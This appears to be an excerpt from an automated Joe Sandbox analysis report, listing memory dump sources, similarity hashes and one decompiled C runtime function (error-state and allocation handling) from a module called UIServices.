                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionRaise
                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                    • API String ID: 3685223789-3176238549
                                                    • Opcode ID: b812b1baf1a1dea540d51f0e271ba70b34f3a78c2d4c2ee043131516ce993cdf
                                                    • Instruction ID: f62b013803f30a474c07af8a8f657fe17e42d7bdaf83ea4fe01cdd6b370bf99b
                                                    • Opcode Fuzzy Hash: b812b1baf1a1dea540d51f0e271ba70b34f3a78c2d4c2ee043131516ce993cdf
                                                    • Instruction Fuzzy Hash: A6018471B2DA6EA1EE40DB18DC401786360FFD0794F5052B1EA4E16665EF6CE508CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 36877a408567f611270a2d2a79b00ad06dd2bb25d704ef3ebaa1c47ff743a3c3
                                                    • Instruction ID: b4926e5fb58bd9939134521473f6683c4b0ed6d630b82d493170b8ac9b750926
                                                    • Opcode Fuzzy Hash: 36877a408567f611270a2d2a79b00ad06dd2bb25d704ef3ebaa1c47ff743a3c3
                                                    • Instruction Fuzzy Hash: F9114C32618B9582EB218F29E840269B7E5FB88B98F184270DECC17759DF3DD965CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 60%
                                                    			E00007FFC7FFC23C664CC(void* __rax, long long __rbx, signed int __rdx, long long __rsi, long long _a8, long long _a16) {
                                                    				void* _t12;
                                                    				intOrPtr _t14;
                                                    				intOrPtr _t16;
                                                    				intOrPtr _t17;
                                                    
                                                    				_a8 = __rbx;
                                                    				_a16 = __rsi;
                                                    				if ( *0x23c74000 != 0xffffffff) goto 0x23c664eb;
                                                    				goto 0x23c6657d;
                                                    				GetLastError();
                                                    				E00007FFC7FFC23C6682C();
                                                    				if (__rax == (__rdx | 0xffffffff)) goto 0x23c66572;
                                                    				if (__rax == 0) goto 0x23c66513;
                                                    				goto 0x23c66572;
                                                    				_t14 =  *0x23c74000; // 0x5
                                                    				if (E00007FFC7FFC23C66874(_t14, __rax, __rax, __rbx, __rdx | 0xffffffff) == 0) goto 0x23c66572;
                                                    				calloc(??, ??);
                                                    				_t16 =  *0x23c74000; // 0x5
                                                    				if (__rax == 0) goto 0x23c66562;
                                                    				if (E00007FFC7FFC23C66874(_t16, __rax, __rax, __rax, __rax) == 0) goto 0x23c6655c;
                                                    				 *((intOrPtr*)(__rax + 0x78)) = 0xfffffffe;
                                                    				goto 0x23c66569;
                                                    				_t17 =  *0x23c74000; // 0x5
                                                    				_t12 = E00007FFC7FFC23C66874(_t17, 0, __rax, __rax, __rax);
                                                    				free(??);
                                                    				SetLastError(??);
                                                    				return _t12;
                                                    			}







                                                    0x7ffc23c664cc
                                                    0x7ffc23c664d1
                                                    0x7ffc23c664e2
                                                    0x7ffc23c664e6
                                                    0x7ffc23c664eb
                                                    0x7ffc23c664f9
                                                    0x7ffc23c66507
                                                    0x7ffc23c6650c
                                                    0x7ffc23c66511
                                                    0x7ffc23c66513
                                                    0x7ffc23c66520
                                                    0x7ffc23c6652a
                                                    0x7ffc23c66530
                                                    0x7ffc23c6653c
                                                    0x7ffc23c66548
                                                    0x7ffc23c6654d
                                                    0x7ffc23c6655a
                                                    0x7ffc23c6655c
                                                    0x7ffc23c66564
                                                    0x7ffc23c6656c
                                                    0x7ffc23c66574
                                                    0x7ffc23c6658c

                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FFC23C66359,?,?,?,?,00007FFC23C6F222,?,?,?,?,?), ref: 00007FFC23C664EB
                                                    • SetLastError.KERNEL32(?,?,?,00007FFC23C66359,?,?,?,?,00007FFC23C6F222,?,?,?,?,?), ref: 00007FFC23C66574
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 2b99468ace53b58ec4e2ce54daba43a8db158de3e52ec82cde71c4580836b028
                                                    • Instruction ID: b4b30304e8b261f53328ac157ba8ae722f07824a711447195954b5f7d15dd0cd
                                                    • Opcode Fuzzy Hash: 2b99468ace53b58ec4e2ce54daba43a8db158de3e52ec82cde71c4580836b028
                                                    • Instruction Fuzzy Hash: 77116320F0923A82FA50A729AC151386665FF88BA0F0447B4DD6E633E5DF3CE851CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%